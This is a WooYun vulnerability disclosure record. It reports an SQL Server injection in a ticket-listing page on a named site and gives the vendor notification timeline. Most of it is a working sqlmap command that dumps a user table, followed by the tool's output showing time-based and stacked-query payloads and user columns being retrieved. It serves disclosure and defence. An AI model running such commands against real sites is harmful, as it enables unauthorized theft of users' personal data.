乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-20: 细节已通知厂商并且等待厂商处理中 2013-12-24: 厂商已经确认,细节仅向厂商公开 2014-01-03: 细节向核心白帽子及相关领域专家公开 2014-01-13: 细节向普通白帽子公开 2014-01-23: 细节向实习白帽子公开 2014-02-03: 细节向公众公开
简单扫描,sqlserver 注入,泄露用户信息
python sqlmap.py -u "25555555.com/menpiao/menpiao/MenPiaoList.aspx?key=xx&type=1" --dump -D kuaida -T tb_user --threads 10 --batch --dbms mssql
[15:18:19] [INFO] testing connection to the target URL[15:18:20] [INFO] heuristics detected web page charset 'ISO-8859-2'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: type Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: key=xx&type=1; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: key=xx&type=1 WAITFOR DELAY '0:0:5'-----[15:18:20] [INFO] testing Microsoft SQL Server[15:18:20] [INFO] confirming Microsoft SQL Server[15:18:20] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[15:18:20] [INFO] fetching columns for table 'tb_user' in database 'kuaida'[15:18:20] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[15:18:20] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..sqlmap got a 302 redirect to 'http://25555555.com:80/menpiao/500.htm'. Do you want to follow? [Y/n] Y[15:18:36] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloadsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y14[15:18:50] [INFO] retrieved:[15:18:55] [INFO] adjusting time delay to 3 seconds due to good response timesaddress[15:20:55] [INFO] retrieved: b[15:21:23] [ERROR] invalid character detected. retrying..[15:21:23] [WARNING] increasing time delay to 4 secondsirthday[15:23:31] [INFO] retrieved: classId[15:25:28] [INFO] retrieved: email[15:26:49] [INFO] retrieved: fax
参数过滤
危害等级:中
漏洞Rank:10
确认时间:2013-12-24 21:53
暂无